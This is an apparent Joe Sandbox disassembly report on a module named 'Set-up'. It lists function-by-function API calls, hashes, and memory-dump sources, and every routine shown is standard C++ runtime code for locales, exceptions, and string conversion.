                                                                                              • Snapshot File: hcaresult_8_2_6bc10000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: ??1_LockitLockit::_Lockit@std@@std::_std::locale::facet::_$??0bad_cast@std@@ExceptionFacet_GetfacetGetgloballocale@locale@std@@H_prolog3IncrefLocimp@12@MtxlockRegisterThrowcodecvtstd::locale::_
                                                                                              • String ID: bad cast
                                                                                              • API String ID: 1669975708-3145022300
                                                                                              • Opcode ID: 3543f4ba89e182695ccb650966190b315c00100d619acec939be0212eb9d53f2
                                                                                              • Instruction ID: 73cf263af1a8d33c900bba58d2c9bb1cdbba3f5527c9165d0dcbd92954a4f3b3
                                                                                              • Opcode Fuzzy Hash: 3543f4ba89e182695ccb650966190b315c00100d619acec939be0212eb9d53f2
                                                                                              • Instruction Fuzzy Hash: 1301A1319205299BCF01DBB4C952AEE7731BF81724F540129E161BB2A0FB3C9B059B61
                                                                                              Function 6BC260EE Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 49COMMONLIBRARYCODE
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • __EH_prolog3.LIBCMT ref: 6BC260F5
                                                                                              • std::_Lockit::_Lockit.LIBCPMT(00000000,00000014,6BC3EF51,?,0000000C,6BC39639,?,?,?,?,?,?,?,?,?,?), ref: 6BC260FF
                                                                                                • Part of subcall function 6BC3B440: _Mtxlock.MSVCP100(?,?,?,6BC1B68B,00000000,00000010), ref: 6BC3B45B
                                                                                              • int.LIBCPMT(00000000,00000014,6BC3EF51,?,0000000C,6BC39639,?,?,?,?,?,?,?,?,?,?), ref: 6BC26116
                                                                                                • Part of subcall function 6BC1B99B: std::_Lockit::_Lockit.LIBCPMT(00000000), ref: 6BC1B9AE
                                                                                                • Part of subcall function 6BC1B99B: ??1_Lockit@std@@QAE@XZ.MSVCP100(00000000), ref: 6BC1B9C8
                                                                                              • std::locale::_Getfacet.LIBCPMT ref: 6BC2611F
                                                                                                • Part of subcall function 6BC1BBFD: ?_Getgloballocale@locale@std@@CAPAV_Locimp@12@XZ.MSVCP100(00000000,?,6BC412BC,00000000,00000000,00000014,6BC41C6C,?,00000008,6BC3961F,?,?,?,?,00000004,6BC3969A), ref: 6BC1BC20
                                                                                              • codecvt.LIBCPMT(?,?,00000000,00000000,00000014,6BC3EF51,?,0000000C,6BC39639,?,?,?,?,?,?,?), ref: 6BC26139
                                                                                              • ??0bad_cast@std@@QAE@PBD@Z.MSVCR100(bad cast,00000000,00000000,00000014,6BC3EF51,?,0000000C,6BC39639,?,?,?,?,?,?,?,?), ref: 6BC2614D
                                                                                              • _CxxThrowException.MSVCR100(?,6BC4CA64), ref: 6BC2615C
                                                                                              • std::locale::facet::_Incref.LIBCPMT(00000000,00000000,00000014,6BC3EF51,?,0000000C,6BC39639,?,?,?,?,?,?,?,?,?), ref: 6BC2616C
                                                                                              • std::locale::facet::_Facet_Register.LIBCPMT ref: 6BC26172
                                                                                              • ??1_Lockit@std@@QAE@XZ.MSVCP100(00000000,00000000,00000014,6BC3EF51,?,0000000C,6BC39639,?,?,?,?,?,?,?,?,?), ref: 6BC2617F
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2150334894.000000006BC11000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BC10000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2149818963.000000006BC10000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2151807645.000000006BC6E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2152116355.000000006BC72000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_6bc10000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: ??1_LockitLockit::_Lockit@std@@std::_std::locale::facet::_$??0bad_cast@std@@ExceptionFacet_GetfacetGetgloballocale@locale@std@@H_prolog3IncrefLocimp@12@MtxlockRegisterThrowcodecvtstd::locale::_
                                                                                              • String ID: bad cast
                                                                                              • API String ID: 1669975708-3145022300
                                                                                              • Opcode ID: bd93268593b89e9f31f2bd400e6067110fb78c5b7dbe1ce375ea84f20a003269
                                                                                              • Instruction ID: 13d3950a165ee143a34c34f074a451abdc21c9cf3dd78683a2da5bf98fac0a83
                                                                                              • Opcode Fuzzy Hash: bd93268593b89e9f31f2bd400e6067110fb78c5b7dbe1ce375ea84f20a003269
                                                                                              • Instruction Fuzzy Hash: A6016D31920A299BCF05DBB0C852AEEB7357F81725F500568E121BB2D0FB3CAB059B61
                                                                                              Function 6BC3D0EE Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 49COMMONLIBRARYCODE
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • __EH_prolog3.LIBCMT ref: 6BC3D0F5
                                                                                              • std::_Lockit::_Lockit.LIBCPMT(00000000,00000014,6BC3ECA5,?), ref: 6BC3D0FF
                                                                                                • Part of subcall function 6BC3B440: _Mtxlock.MSVCP100(?,?,?,6BC1B68B,00000000,00000010), ref: 6BC3B45B
                                                                                              • int.LIBCPMT(00000000,00000014,6BC3ECA5,?), ref: 6BC3D116
                                                                                                • Part of subcall function 6BC1B99B: std::_Lockit::_Lockit.LIBCPMT(00000000), ref: 6BC1B9AE
                                                                                                • Part of subcall function 6BC1B99B: ??1_Lockit@std@@QAE@XZ.MSVCP100(00000000), ref: 6BC1B9C8
                                                                                              • std::locale::_Getfacet.LIBCPMT ref: 6BC3D11F
                                                                                                • Part of subcall function 6BC1BBFD: ?_Getgloballocale@locale@std@@CAPAV_Locimp@12@XZ.MSVCP100(00000000,?,6BC412BC,00000000,00000000,00000014,6BC41C6C,?,00000008,6BC3961F,?,?,?,?,00000004,6BC3969A), ref: 6BC1BC20
                                                                                              • moneypunct.LIBCPMT ref: 6BC3D139
                                                                                              • ??0bad_cast@std@@QAE@PBD@Z.MSVCR100(bad cast,00000000,00000000,00000014,6BC3ECA5,?), ref: 6BC3D14D
                                                                                              • _CxxThrowException.MSVCR100(?,6BC4CA64), ref: 6BC3D15C
                                                                                              • std::locale::facet::_Incref.LIBCPMT(00000000,00000000,00000014,6BC3ECA5,?), ref: 6BC3D16C
                                                                                              • std::locale::facet::_Facet_Register.LIBCPMT ref: 6BC3D172
                                                                                              • ??1_Lockit@std@@QAE@XZ.MSVCP100(00000000,00000000,00000014,6BC3ECA5,?), ref: 6BC3D17F
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2150334894.000000006BC11000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BC10000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2149818963.000000006BC10000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2151807645.000000006BC6E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2152116355.000000006BC72000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_6bc10000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: ??1_LockitLockit::_Lockit@std@@std::_std::locale::facet::_$??0bad_cast@std@@ExceptionFacet_GetfacetGetgloballocale@locale@std@@H_prolog3IncrefLocimp@12@MtxlockRegisterThrowmoneypunctstd::locale::_
                                                                                              • String ID: bad cast
                                                                                              • API String ID: 3875917587-3145022300
                                                                                              • Opcode ID: 71e1ebd457ac72c4642a342bd21e9bc8faefdc1ea6e95f26467d83515282fe4e
                                                                                              • Instruction ID: a5ebd35707a06ab8649d9be86775beda09dda2dd34fa7220d128495bfeeb53c2
                                                                                              • Opcode Fuzzy Hash: 71e1ebd457ac72c4642a342bd21e9bc8faefdc1ea6e95f26467d83515282fe4e
                                                                                              • Instruction Fuzzy Hash: 700161319606299BCF05DBB4C852AEE7335AF81724F950569E120BB2A0FB3C9B05DB61
                                                                                              Function 6BC4109D Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 49COMMONLIBRARYCODE
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • __EH_prolog3.LIBCMT ref: 6BC410A4
                                                                                              • std::_Lockit::_Lockit.LIBCPMT(00000000,00000014,6BC419AF,?,00000008,6BC3961F,?,?,?,?,00000004,6BC3969A,?,0000003F,?,00000000), ref: 6BC410AE
                                                                                                • Part of subcall function 6BC3B440: _Mtxlock.MSVCP100(?,?,?,6BC1B68B,00000000,00000010), ref: 6BC3B45B
                                                                                              • int.LIBCPMT(00000000,00000014,6BC419AF,?,00000008,6BC3961F,?,?,?,?,00000004,6BC3969A,?,0000003F,?,00000000), ref: 6BC410C5
                                                                                                • Part of subcall function 6BC1B99B: std::_Lockit::_Lockit.LIBCPMT(00000000), ref: 6BC1B9AE
                                                                                                • Part of subcall function 6BC1B99B: ??1_Lockit@std@@QAE@XZ.MSVCP100(00000000), ref: 6BC1B9C8
                                                                                              • std::locale::_Getfacet.LIBCPMT ref: 6BC410CE
                                                                                                • Part of subcall function 6BC1BBFD: ?_Getgloballocale@locale@std@@CAPAV_Locimp@12@XZ.MSVCP100(00000000,?,6BC412BC,00000000,00000000,00000014,6BC41C6C,?,00000008,6BC3961F,?,?,?,?,00000004,6BC3969A), ref: 6BC1BC20
                                                                                              • messages.LIBCPMT ref: 6BC410E8
                                                                                              • ??0bad_cast@std@@QAE@PBD@Z.MSVCR100(bad cast,00000000,00000000,00000014,6BC419AF,?,00000008,6BC3961F,?,?,?,?,00000004,6BC3969A,?,0000003F), ref: 6BC410FC
                                                                                              • _CxxThrowException.MSVCR100(?,6BC4CA64), ref: 6BC4110B
                                                                                              • std::locale::facet::_Incref.LIBCPMT(00000000,00000000,00000014,6BC419AF,?,00000008,6BC3961F,?,?,?,?,00000004,6BC3969A,?,0000003F,?), ref: 6BC4111B
                                                                                              • std::locale::facet::_Facet_Register.LIBCPMT ref: 6BC41121
                                                                                              • ??1_Lockit@std@@QAE@XZ.MSVCP100(00000000,00000000,00000014,6BC419AF,?,00000008,6BC3961F,?,?,?,?,00000004,6BC3969A,?,0000003F,?), ref: 6BC4112E
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2150334894.000000006BC11000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BC10000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2149818963.000000006BC10000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2151807645.000000006BC6E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2152116355.000000006BC72000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_6bc10000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: ??1_LockitLockit::_Lockit@std@@std::_std::locale::facet::_$??0bad_cast@std@@ExceptionFacet_GetfacetGetgloballocale@locale@std@@H_prolog3IncrefLocimp@12@MtxlockRegisterThrowmessagesstd::locale::_
                                                                                              • String ID: bad cast
                                                                                              • API String ID: 4221931714-3145022300
                                                                                              • Opcode ID: 048277daccd68af607787532dd2bfe575a5a076cfddfee85164190cdd99cb4f2
                                                                                              • Instruction ID: 2a79690bac04b106b16a2ee9b61016ead3d2aefa3b763fe84d28690316950532
                                                                                              • Opcode Fuzzy Hash: 048277daccd68af607787532dd2bfe575a5a076cfddfee85164190cdd99cb4f2
                                                                                              • Instruction Fuzzy Hash: 2301C0319206299BCF01DBB4C852AAEB731BF85724F540528E161BB2D0FF3C9B01DB61
                                                                                              Function 6BC3D04B Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 49COMMONLIBRARYCODE
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • __EH_prolog3.LIBCMT ref: 6BC3D052
                                                                                              • std::_Lockit::_Lockit.LIBCPMT(00000000,00000014,6BC3EC23,?,0000000C,6BC3962C,?,?,?,?,?,?,?,?,00000004,6BC3969A), ref: 6BC3D05C
                                                                                                • Part of subcall function 6BC3B440: _Mtxlock.MSVCP100(?,?,?,6BC1B68B,00000000,00000010), ref: 6BC3B45B
                                                                                              • int.LIBCPMT(00000000,00000014,6BC3EC23,?,0000000C,6BC3962C,?,?,?,?,?,?,?,?,00000004,6BC3969A), ref: 6BC3D073
                                                                                                • Part of subcall function 6BC1B99B: std::_Lockit::_Lockit.LIBCPMT(00000000), ref: 6BC1B9AE
                                                                                                • Part of subcall function 6BC1B99B: ??1_Lockit@std@@QAE@XZ.MSVCP100(00000000), ref: 6BC1B9C8
                                                                                              • std::locale::_Getfacet.LIBCPMT ref: 6BC3D07C
                                                                                                • Part of subcall function 6BC1BBFD: ?_Getgloballocale@locale@std@@CAPAV_Locimp@12@XZ.MSVCP100(00000000,?,6BC412BC,00000000,00000000,00000014,6BC41C6C,?,00000008,6BC3961F,?,?,?,?,00000004,6BC3969A), ref: 6BC1BC20
                                                                                              • moneypunct.LIBCPMT ref: 6BC3D096
                                                                                              • ??0bad_cast@std@@QAE@PBD@Z.MSVCR100(bad cast,00000000,00000000,00000014,6BC3EC23,?,0000000C,6BC3962C,?,?,?,?,?,?,?,?), ref: 6BC3D0AA
                                                                                              • _CxxThrowException.MSVCR100(?,6BC4CA64), ref: 6BC3D0B9
                                                                                              • std::locale::facet::_Incref.LIBCPMT(00000000,00000000,00000014,6BC3EC23,?,0000000C,6BC3962C,?,?,?,?,?,?,?,?,00000004), ref: 6BC3D0C9
                                                                                              • std::locale::facet::_Facet_Register.LIBCPMT ref: 6BC3D0CF
                                                                                              • ??1_Lockit@std@@QAE@XZ.MSVCP100(00000000,00000000,00000014,6BC3EC23,?,0000000C,6BC3962C,?,?,?,?,?,?,?,?,00000004), ref: 6BC3D0DC
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2150334894.000000006BC11000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BC10000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2149818963.000000006BC10000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2151807645.000000006BC6E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2152116355.000000006BC72000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_6bc10000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: ??1_LockitLockit::_Lockit@std@@std::_std::locale::facet::_$??0bad_cast@std@@ExceptionFacet_GetfacetGetgloballocale@locale@std@@H_prolog3IncrefLocimp@12@MtxlockRegisterThrowmoneypunctstd::locale::_
                                                                                              • String ID: bad cast
                                                                                              • API String ID: 3875917587-3145022300
                                                                                              • Opcode ID: 93ae65f31fe9ca05cb227ef534459e943990130461d2cce61a4cff3fd01c75e9
                                                                                              • Instruction ID: d0ecf422d05f8e4ae02902af8162125574996dac1e8f1b9cc017bd1bc577a47c
                                                                                              • Opcode Fuzzy Hash: 93ae65f31fe9ca05cb227ef534459e943990130461d2cce61a4cff3fd01c75e9
                                                                                              • Instruction Fuzzy Hash: BC01A13192062997CF05DFB4C856AAD7731BF81724F940529E0207B290FB3C9B029B61
                                                                                              Function 6BC2604B Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 49COMMONLIBRARYCODE
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • __EH_prolog3.LIBCMT ref: 6BC26052
                                                                                              • std::_Lockit::_Lockit.LIBCPMT(00000000,00000014,6BC3E96F,?,0000000C,6BC3962C,?,?,?,?,?,?,?,?,00000004,6BC3969A), ref: 6BC2605C
                                                                                                • Part of subcall function 6BC3B440: _Mtxlock.MSVCP100(?,?,?,6BC1B68B,00000000,00000010), ref: 6BC3B45B
                                                                                              • int.LIBCPMT(00000000,00000014,6BC3E96F,?,0000000C,6BC3962C,?,?,?,?,?,?,?,?,00000004,6BC3969A), ref: 6BC26073
                                                                                                • Part of subcall function 6BC1B99B: std::_Lockit::_Lockit.LIBCPMT(00000000), ref: 6BC1B9AE
                                                                                                • Part of subcall function 6BC1B99B: ??1_Lockit@std@@QAE@XZ.MSVCP100(00000000), ref: 6BC1B9C8
                                                                                              • std::locale::_Getfacet.LIBCPMT ref: 6BC2607C
                                                                                                • Part of subcall function 6BC1BBFD: ?_Getgloballocale@locale@std@@CAPAV_Locimp@12@XZ.MSVCP100(00000000,?,6BC412BC,00000000,00000000,00000014,6BC41C6C,?,00000008,6BC3961F,?,?,?,?,00000004,6BC3969A), ref: 6BC1BC20
                                                                                              • codecvt.LIBCPMT(?,?,00000000,00000000,00000014,6BC3E96F,?,0000000C,6BC3962C,?,?,?,?,?,?,?), ref: 6BC26096
                                                                                              • ??0bad_cast@std@@QAE@PBD@Z.MSVCR100(bad cast,00000000,00000000,00000014,6BC3E96F,?,0000000C,6BC3962C,?,?,?,?,?,?,?,?), ref: 6BC260AA
                                                                                              • _CxxThrowException.MSVCR100(?,6BC4CA64), ref: 6BC260B9
                                                                                              • std::locale::facet::_Incref.LIBCPMT(00000000,00000000,00000014,6BC3E96F,?,0000000C,6BC3962C,?,?,?,?,?,?,?,?,00000004), ref: 6BC260C9
                                                                                              • std::locale::facet::_Facet_Register.LIBCPMT ref: 6BC260CF
                                                                                              • ??1_Lockit@std@@QAE@XZ.MSVCP100(00000000,00000000,00000014,6BC3E96F,?,0000000C,6BC3962C,?,?,?,?,?,?,?,?,00000004), ref: 6BC260DC
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2150334894.000000006BC11000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BC10000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2149818963.000000006BC10000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2151807645.000000006BC6E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2152116355.000000006BC72000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_6bc10000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: ??1_LockitLockit::_Lockit@std@@std::_std::locale::facet::_$??0bad_cast@std@@ExceptionFacet_GetfacetGetgloballocale@locale@std@@H_prolog3IncrefLocimp@12@MtxlockRegisterThrowcodecvtstd::locale::_
                                                                                              • String ID: bad cast
                                                                                              • API String ID: 1669975708-3145022300
                                                                                              • Opcode ID: a131b81d04ae9bca6c11470e5d059c52ae8cdd975ab56572a52545c181f64a59
                                                                                              • Instruction ID: d99c8ade957a392f9f345a6bd41ac1b4005896ba14aed06cc27c864a2bf4fda7
                                                                                              • Opcode Fuzzy Hash: a131b81d04ae9bca6c11470e5d059c52ae8cdd975ab56572a52545c181f64a59
                                                                                              • Instruction Fuzzy Hash: 7501A1319206299BCF05DBB0C952AAE7331BF81724F500129E121BB290FF3C9B01AB61
                                                                                              Function 6BC40DB4 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 107COMMONLIBRARYCODE
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • __EH_prolog3_catch.LIBCMT ref: 6BC40DBB
                                                                                              • _Getcvt.MSVCP100(00000008,6BC413C9,00000000,00000001,00000028,6BC4151D,?,?,00000000,00000000,00000014,6BC41B0D,?,00000008,6BC3961F,?), ref: 6BC40DC5
                                                                                                • Part of subcall function 6BC3AD4D: ___lc_handle_func.MSVCR100 ref: 6BC3AD50
                                                                                                • Part of subcall function 6BC3AD4D: ___lc_codepage_func.MSVCR100 ref: 6BC3AD59
                                                                                              • localeconv.MSVCR100 ref: 6BC40DD2
                                                                                              • _Maklocstr.LIBCPMT ref: 6BC40DF0
                                                                                                • Part of subcall function 6BC23503: strlen.MSVCR100 ref: 6BC2350E
                                                                                              • _Maklocstr.LIBCPMT ref: 6BC40E0D
                                                                                              • _Maklocstr.LIBCPMT ref: 6BC40E2A
                                                                                              • _Maklocstr.LIBCPMT ref: 6BC40E47
                                                                                              • memcpy.MSVCR100(?,$+xv,00000004,?,?,?,?,?,?,?,?), ref: 6BC40EC9
                                                                                              • memcpy.MSVCR100(?,$+xv,00000004,?,$+xv,00000004,?,?,?,?,?,?,?,?), ref: 6BC40ED4
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2150334894.000000006BC11000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BC10000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2149818963.000000006BC10000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2151807645.000000006BC6E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2152116355.000000006BC72000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_6bc10000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: Maklocstr$memcpy$GetcvtH_prolog3_catch___lc_codepage_func___lc_handle_funclocaleconvstrlen
                                                                                              • String ID: $+xv
                                                                                              • API String ID: 1805598471-1686923651
                                                                                              • Opcode ID: 403c81a2973e0440528c602d7ec89759a598ef7c501574bf6aa0627701afa268
                                                                                              • Instruction ID: 54595b4e3961df099461d6261713495c6c57155ab912505610cfd3f35c08a8ef
                                                                                              • Opcode Fuzzy Hash: 403c81a2973e0440528c602d7ec89759a598ef7c501574bf6aa0627701afa268
                                                                                              • Instruction Fuzzy Hash: 1B4191B0854B81AED721CF74C891B27BFF8BF19204F04465AE59A87A41E738E714CBA1
                                                                                              Function 6BC30093 Relevance: 16.9, APIs: 11, Instructions: 436COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • _Maklocchr.LIBCPMT ref: 6BC300A9
                                                                                                • Part of subcall function 6BC223EC: _Mbrtowc.MSVCP100(00000000,00000000,00000001,00000000,6BC3C44E,?,?,?,6BC3C44E,?), ref: 6BC2240C
                                                                                              • _Maklocchr.LIBCPMT ref: 6BC300B8
                                                                                              • _Maklocchr.LIBCPMT ref: 6BC300C7
                                                                                              • _Maklocchr.LIBCPMT ref: 6BC300D6
                                                                                              • _Maklocchr.LIBCPMT ref: 6BC300E5
                                                                                              • ?_Getint@?$time_get@_WV?$istreambuf_iterator@_WU?$char_traits@_W@std@@@std@@@std@@ABAHAAV?$istreambuf_iterator@_WU?$char_traits@_W@std@@@2@0HHAAH@Z.MSVCP100(?,?,?,00000001,0000000C,?,?), ref: 6BC30170
                                                                                              • ?_Getint@?$time_get@_WV?$istreambuf_iterator@_WU?$char_traits@_W@std@@@std@@@std@@ABAHAAV?$istreambuf_iterator@_WU?$char_traits@_W@std@@@2@0HHAAH@Z.MSVCP100(?,?,?,00000001,0000000C,?,?,?,?,?,?,?,?,?,?), ref: 6BC304A2
                                                                                                • Part of subcall function 6BC2490A: ?sgetc@?$basic_streambuf@_WU?$char_traits@_W@std@@@std@@QAEGXZ.MSVCP100(?,6BC249A8,?,?,00000000,?,6BC29E20,?,?,?,?,?,00000018), ref: 6BC24915
                                                                                              • ?_Getint@?$time_get@_WV?$istreambuf_iterator@_WU?$char_traits@_W@std@@@std@@@std@@ABAHAAV?$istreambuf_iterator@_WU?$char_traits@_W@std@@@2@0HHAAH@Z.MSVCP100(?,?,?,00000001,0000000C,?,?,?,?,?,?), ref: 6BC30338
                                                                                                • Part of subcall function 6BC2A0ED: _Maklocchr.LIBCPMT ref: 6BC2A180
                                                                                              • ?_Getint@?$time_get@_WV?$istreambuf_iterator@_WU?$char_traits@_W@std@@@std@@@std@@ABAHAAV?$istreambuf_iterator@_WU?$char_traits@_W@std@@@2@0HHAAH@Z.MSVCP100(?,?,?,00000001,0000001F,?,?), ref: 6BC3019B
                                                                                                • Part of subcall function 6BC2A0ED: _Maklocchr.LIBCPMT ref: 6BC2A11C
                                                                                                • Part of subcall function 6BC2A0ED: _Maklocchr.LIBCPMT ref: 6BC2A153
                                                                                                • Part of subcall function 6BC2A0ED: _Stolx.MSVCP100(?,?,0000000A,?,?,?,?), ref: 6BC2A275
                                                                                              • ?_Getint@?$time_get@_WV?$istreambuf_iterator@_WU?$char_traits@_W@std@@@std@@@std@@ABAHAAV?$istreambuf_iterator@_WU?$char_traits@_W@std@@@2@0HHAAH@Z.MSVCP100(?,?,?,00000001,0000001F,?,?,?,?,?,?), ref: 6BC30315
                                                                                              • ?_Getint@?$time_get@_WV?$istreambuf_iterator@_WU?$char_traits@_W@std@@@std@@@std@@ABAHAAV?$istreambuf_iterator@_WU?$char_traits@_W@std@@@2@0HHAAH@Z.MSVCP100(?,?,?,00000001,0000001F,?,?,?,?,?,?,?,?,?,?), ref: 6BC304CA
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2150334894.000000006BC11000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BC10000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2149818963.000000006BC10000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2151807645.000000006BC6E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2152116355.000000006BC72000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_6bc10000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: U?$char_traits@_$V?$istreambuf_iterator@_$Maklocchr$Getint@?$time_get@_W@std@@@2@0W@std@@@std@@@std@@$?sgetc@?$basic_streambuf@_MbrtowcStolxW@std@@@std@@
                                                                                              • String ID:
                                                                                              • API String ID: 368526784-0
                                                                                              • Opcode ID: 769c943989ad4fe4b82485be86eeb6fbfe3a1ffc50ade82a610b67df4753f105
                                                                                              • Instruction ID: 914afd866fa9ac44a9fedcf09be7163fa81af675b10e484d61ac928f42fb0cfc
                                                                                              • Opcode Fuzzy Hash: 769c943989ad4fe4b82485be86eeb6fbfe3a1ffc50ade82a610b67df4753f105
                                                                                              • Instruction Fuzzy Hash: AEF1683281021EAFDF05DF94C881AEE3BB8FF04304F80819AF96596141F7799B65DBA1
                                                                                              Function 6BC3BF06 Relevance: 16.0, APIs: 7, Strings: 2, Instructions: 201COMMONLIBRARYCODE
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2150334894.000000006BC11000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BC10000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2149818963.000000006BC10000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2151807645.000000006BC6E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2152116355.000000006BC72000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_6bc10000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: memchrtolower$__aulldiv_errnoisspace
                                                                                              • String ID: -$0123456789abcdefghijklmnopqrstuvwxyz
                                                                                              • API String ID: 4155486202-1956417402
                                                                                              • Opcode ID: 8b13dc76e3824328829cba2912ec0422bd173b7df76170375b07336f688a8915
                                                                                              • Instruction ID: 17b45763985fc0bd01d219a7634ee20c0b0f70245b46720bc8ee52242b4df918
                                                                                              • Opcode Fuzzy Hash: 8b13dc76e3824328829cba2912ec0422bd173b7df76170375b07336f688a8915
                                                                                              • Instruction Fuzzy Hash: FB719074E156AA9FDF04CFA9C8816EEBBB5BF4A310F504095E851E7240E3398B41CF61
                                                                                              Function 6BC29C3C Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 173COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • __EH_prolog3.LIBCMT ref: 6BC29C43
                                                                                              • ?getloc@ios_base@std@@QBE?AVlocale@2@XZ.MSVCP100(?,00000018), ref: 6BC29C51
                                                                                                • Part of subcall function 6BC1CFBC: std::locale::facet::_Incref.LIBCPMT ref: 6BC1CFCC
                                                                                                • Part of subcall function 6BC1E3A1: __EH_prolog3.LIBCMT ref: 6BC1E3A8
                                                                                                • Part of subcall function 6BC1E3A1: std::_Lockit::_Lockit.LIBCPMT(00000000,00000014,6BC3E895,?,0000000C,6BC3962C,?,?,?,?,?,?,?,?,00000004,6BC3969A), ref: 6BC1E3B2
                                                                                                • Part of subcall function 6BC1E3A1: int.LIBCPMT(00000000,00000014,6BC3E895,?,0000000C,6BC3962C,?,?,?,?,?,?,?,?,00000004,6BC3969A), ref: 6BC1E3C9
                                                                                                • Part of subcall function 6BC1E3A1: std::locale::_Getfacet.LIBCPMT ref: 6BC1E3D2
                                                                                                • Part of subcall function 6BC1E3A1: ??1_Lockit@std@@QAE@XZ.MSVCP100(00000000,00000000,00000014,6BC3E895,?,0000000C,6BC3962C,?,?,?,?,?,?,?,?,00000004), ref: 6BC1E432
                                                                                                • Part of subcall function 6BC1BBA7: std::locale::facet::_Decref.LIBCPMT(6BC3BAD4,?,?,6BC1D257), ref: 6BC1BBAD
                                                                                              • _Maklocchr.LIBCPMT ref: 6BC29C7A
                                                                                                • Part of subcall function 6BC223EC: _Mbrtowc.MSVCP100(00000000,00000000,00000001,00000000,6BC3C44E,?,?,?,6BC3C44E,?), ref: 6BC2240C
